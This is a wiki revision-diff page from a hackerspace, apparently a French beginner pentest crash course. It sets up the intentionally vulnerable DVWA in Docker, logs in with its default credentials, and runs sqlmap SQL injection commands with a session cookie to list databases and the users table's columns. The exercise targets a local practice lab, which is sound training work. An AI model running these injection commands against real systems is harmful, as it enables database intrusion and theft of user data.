Difference between revisions of "Pentest101"
From Tmplab
(Created page with " == Crash course == <code> * Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa * docker run --rm -it -p 80:80 albancrommer/dvwa * browser http:...") |
(→Crash course) |
||
| Line 1: | Line 1: | ||
== Crash course == | == Crash course == | ||
| − | <code> | + | |
| − | + | ||
| − | * docker run --rm -it -p 80:80 albancrommer/dvwa | + | * <code>Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa</code> |
| − | * browser http://localhost | + | * <code>docker run --rm -it -p 80:80 albancrommer/dvwa</code> |
| − | * Se logger comme admin:password | + | * <code>browser http://localhost</code> |
| − | * F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32) | + | * <code>Se logger comme admin:password</code> |
| − | * sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs | + | * <code>F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)</code> |
| − | </code> | + | * <code>sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs</code> |
| + | |||
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ? | On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ? | ||
Revision as of 22:33, 24 September 2020
Crash course
-
Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa -
docker run --rm -it -p 80:80 albancrommer/dvwa -
browser http://localhost -
Se logger comme admin:password -
F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32) -
sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?
sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns
